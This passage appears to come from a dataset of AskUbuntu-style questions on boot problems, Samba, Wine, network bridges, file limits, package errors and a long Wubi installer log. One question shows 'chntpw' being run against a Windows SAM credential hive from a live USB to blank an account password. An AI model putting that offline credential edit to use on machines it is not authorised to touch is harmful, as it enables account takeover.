with the division into /bin and /etc and /opt i will start to run into some problems . of course , i could as a last resort keep two copies of the code - one set up for ubuntu and one set up for windows . but then i would still want a similar folder structure to make the transfer of code changes easy . there should be someone who already has a good solution for this . and perhaps that person could also ( besides giving an example of how to make it cross-platform ) describe why there is such a long chain of files calling other files calling other files in the default quickly setup ? of course , i am now assuming that quickly uses some sort of recommended model for ubuntu . if that is not the case , i would like to get suggestions on what would be a recommended folder structure to distribute an application through ubuntu repositories ?
162184	why is seahorse messing up my samba sharing ?	i am having a miserable time trying to samba files to share correctly . i loaded seahorse in the terminal and got an error . i 'm sure my networking issue is a permission problem . nighthawk @ core4 : ~ $ seahorse ** message : init gpgme version 1.2.0 ( seahorse:3619 ) : glib-gobject-critical ** : read-only property 'window ' on class 'seahorseviewer ' has type 'gtkwidget ' which is not equal to or more restrictive than the type 'gtkwindow ' of the property on the interface 'seahorseview' ( seahorse:3619 ) : glib-gobject-critical ** : read-only property 'icon ' on class 'seahorsepkcs11certificate ' has type 'gchararray ' which is not equal to or more restrictive than the type 'gicon ' of the property on the interface 'gcrcertificateiface' the terminal hangs at this point .
162185	black screen upon booting 12.04 livecd	i downloaded the ubuntu 12.04 iso from the official ubuntu website , when i put it into my computer and boot from dvd drive i get past the little person in the circle but after that its just a black screen with the little line flickering . when i try it on my laptop it gets past that and the logo appears with the dots changed orange , which means the cd works ( the same cd also worked when installing ubuntu 11 and linux mint 12 on the computer that has the problem now ) . what should i do ? my motherboard is an msi p67a-c45 b3 . i recently got it in september 2011 . i heard it has to do with acpi but i should not do that because i have windows installed . i really want to run ubuntu but now i cant .
162191	why does dawn of war in wine show me only wireframe models and not 3d ?	i installed steam and downloaded dawn of war , winters assault and dark crusade they installed no problem and the opening cut scenes play ok but when i get the first load screen the graphics go funny the bottom half goes a multitude of pixelated colours and the top half does nothing . main menu when the main menu appears here is a green wire frame like outline of the background of the right hand side panel and if i go to the options screen there is no background and i can see the main menu screen directly behind it after adjusting the graphics settings the areas affected are smaller but still noticeable race select once i click the campaign the loading screen is a multitude of pixelated colours like the first one and has the top half missing and when i try to choose a race the models look like there still in the early stages of 3d modelling with a green wire frame or parts just aren’t there for instance the buttons on this screen are totally invisible until you hover over them and the background just isn’t there the campaign the main campaign has massive sections of the map missing or looks like its just been wire framed the mini map is half missing to this happens on all three games . does anyone know what’s causing this issue i think it 's the graphics card in the laptop . i really want to know if its fixable and i can’t just play this game on my windows laptop because i keep getting access violation errors . the version of linux i’m using is ubuntu 12.04 and i have the latest version of wine and as of this post have all available updates .
162193	how do i start my network bridge automatically upon boot ?	i have created a network bridge in ubuntu 11.10 and have a second computer accessing the network and internet through the bridge . the bridge comes up and is active before the log on screen but after about 30 mins of idle time for the ubuntu computer the bridge becomes disabled . i can no longer ping the bridge from the second computer . i can type `` sudo /etc/init.d/networking restart '' and i can start using the internet through the bridge again . i have tried modifying my power settings , telling the computer to never to go sleep or hibernate . i think there is something simple that i am missing but my adapters config file consists of : auto lo eth0 eth1 bridge0 iface lo inet loopback iface eth0 inet manual iface eth1 inet manual iface bridge0 inet static address x.x.x.x netmask x.x.x.x network x.x.x.x broadcast x.x.x.x gateway x.x.x.x nameservers x.x.x.x bridge_ports eth0 eth1 pre-up ip link set eth0 promisc on pre-up ip link set eth1 promisc on bridge_fd 0 bridge_hello 2 bridge_maxage 12 bridge_stp off ip link set bridge0 promisc on not sure if i set something i should not of or if there is a setting that i am missing to prevent this . i want this connection to be running when the computer boots without a user being logged in , which is currently how it is working .
162198	which lightweight terminal emulators supports transparency ?	i know that gnome-terminal and the kde terminal both support transparency , but i 'm looking for something lighter on resources than those . what other xterminal emulators support transparency ?
162204	how do i boot into a luks-encrypted environment ?	i one drive in my computer . it is encrypted with luks , and i almost successfully installed ubuntu 12.04 onto it . the only issue is the bootloader - grub2 would not install anywhere . tried an external usb drive and the internal drive . i also tried to make my own grub , which worked better , but still did n't actually boot the drive . that fell back into busybox or initramfs or something . so is there any way to boot into an luks-encrypted drive ?
162210	why does apache keep running out of memory ?	all the time my apache2 runs out of memory , i have 6 sites running on it . my server specs are : 2 gig ram , 6 core processor , 60 gb hard drive , and a 1000 mb/s how can i sort the problem out ? it crashes the whole server : ( screenshot :
162211	shutdown does not depower	when shutting down in 12.04 , either in terminal or gui , the result is a laptop ( dell inspiron m4300 ) which is still powered . i then have to hold the power button for 5 seconds to depower . it 's just an annoyance , but an annoyance i would n't mind getting to the bottom of . any thoughts ?
162214	not able to change brightness on a compaq presario cq61	here is my result of lsmod module size used by joydev 17393 0 vesafb 13516 1 snd_hda_codec_hdmi 31775 1 snd_hda_codec_idt 60251 1 snd_hda_intel 32765 3 snd_hda_codec 109562 3 snd_hda_codec_hdmi , snd_hda_codec_idt , snd_hda_intel snd_hwdep 13276 1 snd_hda_codec snd_pcm 80845 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec nvidia 10958194 42 snd_seq_midi 13132 0 arc4 12473 2 snd_rawmidi 25424 1 snd_seq_midi ath9k 117425 0 snd_seq_midi_event 14475 1 snd_seq_midi mac80211 436455 1 ath9k bnep 17830 2 snd_seq 51567 2 snd_seq_midi , snd_seq_midi_event uvcvideo 67203 0 rfcomm 38139 0 parport_pc 32114 0 ath9k_common 13781 1 ath9k snd_timer 28931 2 snd_pcm , snd_seq psmouse 87213 0 videodev 86588 1 uvcvideo snd_seq_device 14172 3 snd_seq_midi , snd_rawmidi , snd_seq bluetooth 158438 8 bnep , rfcomm ppdev 12849 0 serio_raw 13027 0 ath9k_hw 391523 2 ath9k , ath9k_common ath 19387 3 ath9k , ath9k_common , ath9k_hw mac_hid 13077 0 binfmt_misc 17292 1 cfg80211 178679 3 ath9k , mac80211 , ath snd 62064 16 snd_hda_codec_hdmi , snd_hda_codec_idt , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device soundcore 14635 1 snd snd_page_alloc 14115 2 snd_hda_intel , snd_pcm lp 17455 0 parport 40930 3 parport_pc , ppdev , lp r8169 56321 0 usbhid 41906 0 hid 77367 1 usbhid
162221	what do i do if i want to execute ls command everytime i do a cd to any directory ?	most of the time when i do a cd command i also do a ls to see what other files or folder are in that directory . so i want to execute ls everytime i change the directory . i know i can do cd foo & & ls but is it really necessary to do & & ls everytime ?
162229	how do i increase the open files limit for a non-root user ?	this is happening on ubuntu release 12.04 ( precise ) 64-bit kernel linux 3.2.0-25-virtual i 'm trying to increase the number of open files allowed for a user . this is for an my ecplise java application where the current limit of 1024 is not enough . according to the posts i 've found so far , i should be able to put lines into /etc/security/limits.conf like this ; soft nofile 4096 hard nofile 4096 to increase the number of open files allowed for all users . but , that 's not working for me , and i think the problem is not related to that file . for all users , the default limit is 1024 , regardless of what is in /etc/security/limits.conf ( i have been rebooting after changing that file ) $ ulimit -n 1024 now , despite the entries in /etc/security/limits.conf i ca n't increase that ; $ ulimit -n 2048 -bash : ulimit : open files : can not modify limit : operation not permitted the weird part is that i can change the limit downwards , but ca n't change it upwards - even to go back to a number which is below the original limit ; $ ulimit -n 800 $ ulimit -n 800 $ ulimit -n 900 -bash : ulimit : open files : can not modify limit : operation not permitted as root , i can change that limit to whatever i want , up or down . it does n't even seem to care about the supposedly system-wide limit in /proc/sys/fs/file-max # cat /proc/sys/fs/file-max 188897 # ulimit -n 188898 # ulimit -n 188898 but even i get eclipse to run as root , my application stills crash becuase of `` too many open file '' exception ! so far , i have n't found any way to increase the open files limit for a non-root user . how should i properly do this ? i have looked at all the posted and tried the given options but no luck !
162231	is there a unity lens to replace the filemanager	i 'm setting up ubuntu for a couple who have very little knowledge of computers in general . instead of making them open nautilus to find their family photos and videos , is there an already made unity lens where the photos and videos can be browsed via the dash , and the filter options be the name of particular folders rather than `` file types '' or `` date accessed '' and `` file size '' ?
162237	ubuntu 12.04 wo n't boot at all for the first time	so i tried installing ubuntu for the first time today , and it installed all well , but then it froze at the 'preparing to run ubuntu for the first time ... ' screen . i then proceeded to restart my computer and load ubuntu from the os selection screen . my screen completely froze and the picture did n't even come up fully as if my video driver was not installed correctly . are there any fixes to this problem ? would greatly appreciate it . possible useful information : using http : //www.ubuntu.com/download/desktop/windows-installer dual-booting with windows
162247	why does ctrl + left arrow not skip words ?	i 'm on my ubuntu 12.04 . every time i 'm editing text , i use ctrl + left/right to move/jump between words . recently , i installed xscreensaver and changed keyboard shortcuts to activate my screensaver . but then , ctrl + left stoped responding to normally ( move to the next word to the left ) . ctrl + right still jumps to next word to the right . the problem occurs whether i 'm using the terminal , gedit or even typing text in webpages . i reverted back to gnome-screensaver , removed xscreensaver ( also fixed my keyboard shortcuts ) . but the issue remains . i tried to copy contents from /etc/inputrc to ~/.inputrc ( by default , i do n't have ~/.inputrc ) . i got some info here : strange characters appearing when i use the ctrl and arrow keys to navigate please help . edit : here 's my ~/.inputrc : # /etc/inputrc - global inputrc for libreadline # see readline ( 3readline ) and `info rluserman ' for more information . # be 8 bit clean . set input-meta on set output-meta on # to allow the use of 8bit-characters like the german umlauts , uncomment # the line below . however this makes the meta key not work as a meta key , # which is annoying to those which do n't need to type in 8-bit characters . # set convert-meta off # try to enable the application keypad when it is called . some systems # need this to enable the arrow keys . # set enable-keypad on # see /usr/share/doc/bash/inputrc.arrows for other codes of arrow keys # do not bell on tab-completion # set bell-style none # set bell-style visible # some defaults / modifications for the emacs mode $ if mode=emacs # allow the use of the home/end keys '' \e [ 1~ '' : beginning-of-line '' \e [ 4~ '' : end-of-line # allow the use of the delete/insert keys '' \e [ 3~ '' : delete-char '' \e [ 2~ '' : quoted-insert # mappings for `` page up '' and `` page down '' to step to the beginning/end # of the history # `` \e [ 5~ '' : beginning-of-history # `` \e [ 6~ '' : end-of-history # alternate mappings for `` page up '' and `` page down '' to search the history # `` \e [ 5~ '' : history-search-backward # `` \e [ 6~ '' : history-search-forward # mappings for ctrl-left-arrow and ctrl-right-arrow for word moving '' \e [ 1 ; 5c '' : forward-word '' \e [ 1 ; 5d '' : backward-word '' \e [ 5c '' : forward-word '' \e [ 5d '' : backward-word '' \e\e [ c '' : forward-word '' \e\e [ d '' : backward-word $ if term=rxvt '' \e [ 8~ '' : end-of-line '' \eoc '' : forward-word '' \eod '' : backward-word $ endif # for non rh/debian xterm , ca n't hurt for rh/debian xterm # `` \eoh '' : beginning-of-line # `` \eof '' : end-of-line # for freebsd console # `` \e [ h '' : beginning-of-line # `` \e [ f '' : end-of-line $ endif if i remove /etc/inputrc , here 's what i get if i hold ctrl then press right arrow five times : unlike the first image above , holding ctrl and pressing left arrow more than once will not print out ; 5d again ... it 's like it 's accepting the command once and does n't do it anymore .. see below image :
162252	i installed ubuntu 12.04 using wubi	i installed ubuntu 12.04 using wubi but i want to know how can i uninstalled without causing a problem .
162253	corrupt pidgin - unable to remove	i recently installed pidgin and tried to install pidgin-facebookchat . ubuntu software center now says that pidgin is corrupt so i press repair but nothing gets fixed . i 've tried sudo apt-get purge pidgin but i get this error : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : pidgin-data : breaks : pidgin-facebookchat ( < 1.69-2 ) but 1.69 is to be installed pidgin-libnotify : depends : pidgin ( < 1:3.0 ) but it is not going to be installed depends : pidgin ( > = 1:2.10 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . and sudo apt-get -f install results in this error reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : language-pack-kde-zh-hans-base firefox-locale-zh-hans language-pack-kde-en kde-l10n-engb language-pack-zh-hans-base kde-l10n-zhcn language-pack-zh-hans language-pack-kde-zh-hans language-pack-kde-en-base use 'apt-get autoremove ' to remove them . the following extra packages will be installed : pidgin-facebookchat the following packages will be upgraded : pidgin-facebookchat 1 upgraded , 0 newly installed , 0 to remove and 31 not upgraded . 1 not fully installed or removed . need to get 0 b/39.8 kb of archives . after this operation , 139 kb of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : warning : there 's no installed package matching pidgin-facebookchat : amd64 how can i uninstall pidgin from my computer ? , it is also blocking other applications from being installed .
162255	does juju really need two nodes ?	hi i am trying to deploy openstack with juju and maas . but the juju bootstap is still with the status connecting to environment : marcel @ ubuntu20 : ~ $ juju -v status 2012-07-11 07:18:00,831 debug initializing juju status runtime 2012-07-11 07:18:00,842 info **connecting to environment** ... 2012-07-11 07:18:00,961 debug connecting to environment using node5 ... 2012-07-11 07:18:00,962 debug spawning ssh process with remote_user= '' ubuntu '' remote_host= '' node5 '' remote_port= '' 2181 '' local_port= '' 52179 '' . 2012-07-11 07:18:01,468:11263 ( 0x7f8ffb223700 ) : zoo_info @ log_env @ 658 : client environment : zookeeper.version=zookeeper c client 3.3.5 2012-07-11 07:18:01,468:11263 ( 0x7f8ffb223700 ) : zoo_info @ log_env @ 662 : client environment : host.name=ubuntu20 2012-07-11 07:18:01,468:11263 ( 0x7f8ffb223700 ) : zoo_info @ log_env @ 669 : client environment : os.name=linux 2012-07-11 07:18:01,468:11263 ( 0x7f8ffb223700 ) : zoo_info @ log_env @ 670 : client environment : os.arch=3.2.0-23-generic 2012-07-11 07:18:01,468:11263 ( 0x7f8ffb223700 ) : zoo_info @ log_env @ 671 : client environment : os.version= # 36-ubuntu smp tue apr 10 20:39:51 utc 2012 2012-07-11 07:18:01,469:11263 ( 0x7f8ffb223700 ) : zoo_info @ log_env @ 679 : client environment : user.name=marcel 2012-07-11 07:18:01,469:11263 ( 0x7f8ffb223700 ) : zoo_info @ log_env @ 687 : client environment : user.home=/home/marcel 2012-07-11 07:18:01,469:11263 ( 0x7f8ffb223700 ) : zoo_info @ log_env @ 699 : client environment : user.dir=/home/marcel 2012-07-11 07:18:01,469:11263 ( 0x7f8ffb223700 ) : zoo_info @ zookeeper_init @ 727 : initiating client connection , host=localhost:52179 sessiontimeout=10000 watcher=0x7f8ff90536b0 sessionid=0 sessionpasswd= < null > context=0x2444670 flags=0 2012-07-11 07:18:01,469:11263 ( 0x7f8ff5dad700 ) : zoo_info @ check_events @ 1585 : initiated connection to server [ 127.0.0.1:52179 ] 2012-07-11 07:18:01,470:11263 ( 0x7f8ff5dad700 ) : zoo_error @ handle_socket_error_msg @ 1603 : socket [ 127.0.0.1:52179 ] zk retcode=-4 , errno=112 ( host is down ) : failed while receiving a server response 2012-07-11 07:18:04,807:11263 ( 0x7f8ff5dad700 ) : zoo_error @ handle_socket_error_msg @ 1579 : socket [ 127.0.0.1:52179 ] zk retcode=-4 , errno=111 ( connection refused ) : server refused to accept the client 2012-07-11 07:18:08,143:11263 ( 0x7f8ff5dad700 ) : zoo_error @ handle_socket_error_msg @ 1579 : socket [ 127.0.0.1:52179 ] zk retcode=-4 , errno=111 ( connection refused ) : server refused to accept the client 2012-07-11 07:18:11,480:11263 ( 0x7f8ff5dad700 ) : zoo_error @ handle_socket_error_msg @ 1579 : socket [ 127.0.0.1:52179 ] zk retcode=-4 , errno=111 ( connection refused ) : server refused to accept the client 2012-07-11 07:18:14,816:11263 ( 0x7f8ff5dad700 ) : zoo_error @ handle_socket_error_msg @ 1579 : socket [ 127.0.0.1:52179 ] zk retcode=-4 , errno=111 ( connection refused ) : server refused to accept the client i waited now two days and nothing happened : but i have only one node because i wanted to check if it is realy working before i continue and install more nodes . but i read https : //wiki.ubuntu.com/serverteam/maas/juju have at least two nodes added to your maas . that i need at least two nodes . do i really need two nodes ? that the bootstap is working ? i am not in the lab so i ca n't install one more node so easy . but if it will work i will than i will go there ... and is there anyway to do the bootstrap manually that i can do it instand . i am running out of time and i really need to deploy openstack i ca n't wait days to do the bootstap .
162258	speed issues with precise on amdathlon	i have an amd athlon x2 260 processor ( dual core @ 3.2 ghz - no over clocking , default bios values ) running on an asus motherboard . it is a brand new motherboard and has 4 gb ram . i have installed 12.04 -64 bit on it . all updates installed firstly , it takes about 13 secs to log in and see the desktop wallpaper after entering the password . beyond that , it takes 3 seconds more to see the unity bar and the icons . whenever i am opening any application for the first time , it takes anywhere between 10 to 30 seconds . for e.g . firefox browser ( 25 secs ) , gwibber ( 15 secs ) , empathy ( 12 secs ) , evolution ( 27 secs ) , home folder ( 7 secs ) , writer ( 17 secs ) , calc ( 12 secs ) , impress ( 14 secs ) , jokosher & audicity ( 22 secs ) , ubuntu software center ( 26 secs ) , filezilla ( 10 secs ) , cheese ( 11 secs ) it is extremely annoying to wait for the application to open for the first time . once the application is opened , then probably it remains in the cache and hence , if i close the app and open it again , it opens faster than the blink of an eye . i have enabled desktop screenlets to check the processor & ram utilization . the values are quite normal . ram fluctuates between 15 % to 30 % depending on how many apps i have opened . ( after the pc boots , memory utilization is 386 mb out of 4 gb with no utilization of swap space ) and processor utilization fluctuates between 2 % to 20 % with sporadic peaks reaching 65 % to 75 % . as and when i start opening apps , memory utilization goes up and if i open all of the above apps , it reaches to about 1.4 gb . following is the hardware configuration amd athlon x2 260 asus motherboard m2xxxx-le 4 gb 1333 mhz ram 80 gb seagate sata hdd for the os 1tb seagate x 2 for data storage standard usb keyboard mouse logitech c11 usb camera geforce 7800 pci express display card - 512 mb ram dell 22 '' led and samsung 20 '' led monitors ubuntu 12.04 lts 64 bit i have a partition where i have ubuntu 11.10 - 64 bit running . surprisingly , that installation is working very nicely . quite decent speed . everything under 2/3 seconds any help to resolve the issue is welcome best regards
162261	vmware tools does not work in ubuntu 12.04 guest	i just installed ubuntu 12.04 on vmware workstation 8.0.4 . i am trying to install vmware tools , but i got stuck on this step : the filesystem driver ( vmhgfs module ) is used only for the shared folder feature . the rest of the software provided by vmware tools is designed to work independently of this feature . if you wish to have the shared folders feature , you can install the driver by running vmware-config-tools.pl again after making sure that gcc , binutils , make and the kernel sources for your running kernel are installed on your machine . these packages are available on your distribution 's installation cd . [ press enter key to continue ] i have installed gcc , binutils , build-essential , make , and linux-headers- $ ( uname -r ) are installed ( per this thread : how to make sure that gcc , binutils , make and the kernel source are installed ? ) it still asks me for those things on the next run of sudo vmware-config-tools.pl anyone have any idea how to solve this problem ? thanks a lot !
162264	problem in multi booting ubuntu 12.04 with existing windows xp , 7 and 8 in 500gb hdd with 5 partitions	here 's my case . i have 500gb hdd with 5 partitions with xp , windows7 and windows8 rp in the first three . as per one of the instruction i 've seen in this forum , i did shrink my 4th partition to create a 30gb unallocated free space to install ubuntu 12.04 . but , when next i 'm trying to boot the ubuntu cd and choosing `` something else '' , its only recognizing my 500gb hdd in whole as `` /sda '' and not reading the free 30gb space separately to install ubuntu in it as suggested in the instruction mentioned in this forum . i 've also tried to install in from within windows7 , by mounting the ubuntu iso file and using the .exe file and instruction thereupon ( choosing free drive , user name , installation size , etc . ) , but that also failed after the pc restarted to continue the installation , showing as error for file extension , partition something error . one thing to be noted that the pc i 'm trying to install ubuntu in it is my home pc and does n't have any internet connection . hence , no updates or otherwise online help . what shall i do ? ? kindly suggest . sorry if i made some grammatical mistakes as english is not my first language . thanks in advance .
162265	how to setup dhcp server and dynamic dns with bind ?	i have installed the two servers ( dhcp & dns ) what i need is to make the dns dynamically configure the ips that dhcp server will offer to the terminals on the network . thanks in advance
162267	problem with using chntpw in ubuntu to reset windows 7 password	i tried resetting the password of windows 7 using chntpw command in ubuntu . it showed success . but when i try to login from windows it does not seem to be changed . i first used live usb of ubuntu 11.10 and did try ubuntu . then i did : sudo apt-get install chntpw and then : cd /media/vista/windows/system32/config sudo chntpw -u username sam i followed these instructions and got success like this : hives that have changed : # name 0 < sam > write hive files ? ( y/n ) [ n ] : y 0 < sam > â ok . but when i try to login to windows with blank password , i could not log in . i also tried changing the password and showed success but i could not log in with that password .
162268	adding x-scheme-handler without a popup in firefox	i have written a simple application which registers an `` x-scheme-handler '' in the .desktop file . something like this : - [ desktop entry ] name=foo exec=/usr/bin/foo % u type=application nodisplay=true categories=system ; mimetype=x-scheme-handler/foo ; this allows a user to click a foo : // link in the browser to launch my app . however firefox pops up a `` launch application '' dialog box to ask the user which application to launch , with mine being the default . how can i suppress this dialog box so that firefox just launches the application without requiring the popup confirmation .
162276	grub not showing ubuntu even after boot repair	i had installed windows 7 and ubuntu 12.04 side by side using dual boot . recently i reinstalled my windows and the grub menu disappeared .i ran a boot repair from my ubuntu live cd to reinstall grub but it is still not showing ubuntu but only windows in grub http : //paste.ubuntu.com/1059475
162282	what is the sudo password after i deleted the password for the user ?	to have an easier access to the computer i deleted the user 's password so it is blank . but now i 'm still asked to type in a password for sudo actions such as installing programms , etc . i know that this belongs to ubuntu 's outrageous security policy ( which is why i use ubuntu in the first place.. ) but i do n't have any password to enter any more ! ! the old user password is not accepted and anything else ( like just hitting enter ) does n't work either . i already tried the recovery mode ( root shell ) way passwd > user < but it replied that it ca n't access the password or it has no authority . thanks in advance for your help !
162283	why did n't 12.04 install ?	ok , so i 've installed ubuntu many times on my computer.. normally on the same partition , and windows would always delete ubuntu ( i do n't know how.. it just happens ) if i go away from keyboard during boot and it chooses windows automatically because i took to long . so i tried to reinstall again , but after the fifth time it would n't let me , and told me to check `` wubi-12.04-rev266.log '' . it took a while to find , but when i found it , i had no idea what any of it meant , as i 'm no programmer.i first tried this the day precise pangolin came out . so skip ahead 2.5 months , when i finally found this file , and i then got the idea of making a new partition to install ubuntu on , but i used wubi , like i always did . it did n't look like it would f anything up , so i did it . it went through all the downloads , extracting , etc . which took about 40 minutes total , then ended with an error message saying to check `` wubi-12.04-rev266.log '' . i did . here 's what it says : 07-10 23:33 info root : === wubi 12.04 rev266 === 07-10 23:33 debug root : logfile is c : \users\joseph\appdata\local\temp\wubi-12.04-rev266.log 07-10 23:33 debug root : sys.argv = [ 'main.pyo ' , ' -- exefile= '' c : \\users\\joseph\\downloads\\wubi.exe '' ' ] 07-10 23:33 debug commonbackend : data_dir=c : \users\joseph\appdata\local\temp\pyla05e.tmp\data 07-10 23:33 debug windowsbackend : 7z=c : \users\joseph\appdata\local\temp\pyla05e.tmp\bin\7z.exe 07-10 23:33 debug windowsbackend : startup_folder=c : \programdata\microsoft\windows\start menu\programs\startup 07-10 23:33 debug commonbackend : fetching basic info ... 07-10 23:33 debug commonbackend : original_exe=c : \users\joseph\downloads\wubi.exe 07-10 23:33 debug commonbackend : platform=win32 07-10 23:33 debug commonbackend : osname=nt 07-10 23:33 debug commonbackend : language=en_us 07-10 23:33 debug commonbackend : encoding=cp1252 07-10 23:33 debug windowsbackend : arch=amd64 07-10 23:33 debug commonbackend : parsing isolist=c : \users\joseph\appdata\local\temp\pyla05e.tmp\data\isolist.ini 07-10 23:33 debug commonbackend : adding distro xubuntu-i386 07-10 23:33 debug commonbackend : adding distro edubuntu-i386 07-10 23:33 debug commonbackend : adding distro xubuntu-amd64 07-10 23:33 debug commonbackend : adding distro kubuntu-amd64 07-10 23:33 debug commonbackend : adding distro mythbuntu-i386 07-10 23:33 debug commonbackend : adding distro edubuntu-amd64 07-10 23:33 debug commonbackend : adding distro ubuntu-amd64 07-10 23:33 debug commonbackend : adding distro lubuntu-i386 07-10 23:33 debug commonbackend : adding distro ubuntu-i386 07-10 23:33 debug commonbackend : adding distro mythbuntu-amd64 07-10 23:33 debug commonbackend : adding distro kubuntu-i386 07-10 23:33 debug commonbackend : adding distro lubuntu-amd64 07-10 23:33 debug windowsbackend : fetching host info ... 07-10 23:33 debug windowsbackend : registry_key=software\microsoft\windows\currentversion\uninstall\wubi 07-10 23:33 debug windowsbackend : windows version=vista 07-10 23:33 debug windowsbackend : windows_version2=windows 7 home premium 07-10 23:33 debug windowsbackend : windows_sp=none 07-10 23:33 debug windowsbackend : windows_build=7600 07-10 23:33 debug windowsbackend : gmt=-8 07-10 23:33 debug windowsbackend : country=us 07-10 23:33 debug windowsbackend : timezone=america/los_angeles 07-10 23:33 debug windowsbackend : windows_username=joseph 07-10 23:33 debug windowsbackend : user_full_name=joseph 07-10 23:33 debug windowsbackend : user_directory=c : \users\joseph 07-10 23:33 debug windowsbackend : windows_language_code=1033 07-10 23:33 debug windowsbackend : windows_language=english 07-10 23:33 debug windowsbackend : processor_name=intel ( r ) core ( tm ) i3 cpu m 370 @ 2.40ghz 07-10 23:33 debug windowsbackend : bootloader=vista 07-10 23:33 debug windowsbackend : system_drive=drive ( c : hd 78696.8203125 mb free ntfs ) 07-10 23:33 debug windowsbackend : drive=drive ( c : hd 78696.8203125 mb free ntfs ) 07-10 23:33 debug windowsbackend : drive=drive ( d : hd 4303.48046875 mb free ntfs ) 07-10 23:33 debug windowsbackend : drive=drive ( e : cd 0.0 mb free udf ) 07-10 23:33 debug windowsbackend : drive=drive ( u : hd 79907.8320313 mb free ntfs ) 07-10 23:33 debug windowsbackend : uninstaller_path=none 07-10 23:33 debug windowsbackend : previous_target_dir=none 07-10 23:33 debug windowsbackend : previous_distro_name=none 07-10 23:33 debug windowsbackend : keyboard_id=67699721 07-10 23:33 debug windowsbackend : keyboard_layout=us 07-10 23:33 debug windowsbackend : keyboard_variant= 07-10 23:33 debug commonbackend : python locale= ( 'en_us ' , 'cp1252 ' ) 07-10 23:33 debug commonbackend : locale=en_us.utf-8 07-10 23:33 debug windowsbackend : total_memory_mb=3893.859375 07-10 23:33 debug commonbackend : searching isos on usb devices 07-10 23:33 debug commonbackend : searching for local cds 07-10 23:33 debug distro : checking whether c : \users\joseph\appdata\local\temp\pyla05e.tmp is a valid ubuntu cd 07-10 23:33 debug distro : does not contain c : \users\joseph\appdata\local\temp\pyla05e.tmp\casper\filesystem.squashfs 07-10 23:33 debug distro : checking whether c : \users\joseph\appdata\local\temp\pyla05e.tmp is a valid ubuntu cd 07-10 23:33 debug distro : does not contain c : \users\joseph\appdata\local\temp\pyla05e.tmp\casper\filesystem.squashfs 07-10 23:33 debug distro : checking whether c : \users\joseph\appdata\local\temp\pyla05e.tmp is a valid kubuntu cd 07-10 23:33 debug distro : does not contain c : \users\joseph\appdata\local\temp\pyla05e.tmp\casper\filesystem.squashfs 07-10 23:33 debug distro : checking whether c : \users\joseph\appdata\local\temp\pyla05e.tmp is a valid kubuntu cd 07-10 23:33 debug distro : does not contain c : \users\joseph\appdata\local\temp\pyla05e.tmp\casper\filesystem.squashfs 07-10 23:33 debug distro : checking whether c : \users\joseph\appdata\local\temp\pyla05e.tmp is a valid xubuntu cd 07-10 23:33 debug distro : does not contain c : \users\joseph\appdata\local\temp\pyla05e.tmp\casper\filesystem.squashfs 07-10 23:33 debug distro : checking whether c : \users\joseph\appdata\local\temp\pyla05e.tmp is a valid xubuntu cd 07-10 23:33 debug distro : does not contain c : \users\joseph\appdata\local\temp\pyla05e.tmp\casper\filesystem.squashfs 07-10 23:33 debug distro : checking whether c : \users\joseph\appdata\local\temp\pyla05e.tmp is a valid mythbuntu cd 07-10 23:33 debug distro : does not contain c : \users\joseph\appdata\local\temp\pyla05e.tmp\casper\filesystem.squashfs 07-10 23:33 debug distro : checking whether c : \users\joseph\appdata\local\temp\pyla05e.tmp is a valid mythbuntu cd 07-10 23:33 debug distro : does not contain c : \users\joseph\appdata\local\temp\pyla05e.tmp\casper\filesystem.squashfs 07-10 23:33 debug distro : checking whether c : \users\joseph\appdata\local\temp\pyla05e.tmp is a valid edubuntu cd 07-10 23:33 debug distro : does not contain c : \users\joseph\appdata\local\temp\pyla05e.tmp\casper\filesystem.squashfs 07-10 23:33 debug distro : checking whether c : \users\joseph\appdata\local\temp\pyla05e.tmp is a valid edubuntu cd 07-10 23:33 debug distro : does not contain c : \users\joseph\appdata\local\temp\pyla05e.tmp\casper\filesystem.squashfs 07-10 23:33 debug distro : checking whether c : \users\joseph\appdata\local\temp\pyla05e.tmp is a valid lubuntu cd 07-10 23:33 debug distro : does not contain c : \users\joseph\appdata\local\temp\pyla05e.tmp\casper\filesystem.squashfs 07-10 23:33 debug distro : checking whether c : \users\joseph\appdata\local\temp\pyla05e.tmp is a valid lubuntu cd 07-10 23:33 debug distro : does not contain c : \users\joseph\appdata\local\temp\pyla05e.tmp\casper\filesystem.squashfs 07-10 23:33 debug distro : checking whether d : \ is a valid ubuntu cd 07-10 23:33 debug distro : does not contain d : \casper\filesystem.squashfs 07-10 23:33 debug distro : checking whether d : \ is a valid ubuntu cd 07-10 23:33 debug distro : does not contain d : \casper\filesystem.squashfs 07-10 23:33 debug distro : checking whether d : \ is a valid kubuntu cd 07-10 23:33 debug distro : does not contain d : \casper\filesystem.squashfs 07-10 23:33 debug distro : checking whether d : \ is a valid kubuntu cd 07-10 23:33 debug distro : does not contain d : \casper\filesystem.squashfs 07-10 23:33 debug distro : checking whether d : \ is a valid xubuntu cd 07-10 23:33 debug distro : does not contain d : \casper\filesystem.squashfs 07-10 23:33 debug distro : checking whether d : \ is a valid xubuntu cd 07-10 23:33 debug distro : does not contain d : \casper\filesystem.squashfs 07-10 23:33 debug distro : checking whether d : \ is a valid mythbuntu cd 07-10 23:33 debug distro : does not contain d : \casper\filesystem.squashfs 07-10 23:33 debug distro : checking whether d : \ is a valid mythbuntu cd 07-10 23:33 debug distro : does not contain d : \casper\filesystem.squashfs 07-10 23:33 debug distro : checking whether d : \ is a valid edubuntu cd 07-10 23:33 debug distro : does not contain d : \casper\filesystem.squashfs 07-10 23:33 debug distro : checking whether d : \ is a valid edubuntu cd 07-10 23:33 debug distro : does not contain d : \casper\filesystem.squashfs 07-10 23:33 debug distro : checking whether d : \ is a valid lubuntu cd 07-10 23:33 debug distro : does not contain d : \casper\filesystem.squashfs 07-10 23:33 debug distro : checking whether d : \ is a valid lubuntu cd 07-10 23:33 debug distro : does not contain d : \casper\filesystem.squashfs 07-10 23:33 debug distro : checking whether e : \ is a valid ubuntu cd 07-10 23:33 debug distro : does not contain e : \casper\filesystem.squashfs 07-10 23:33 debug distro : checking whether e : \ is a valid ubuntu cd 07-10 23:33 debug distro : does not contain e : \casper\filesystem.squashfs 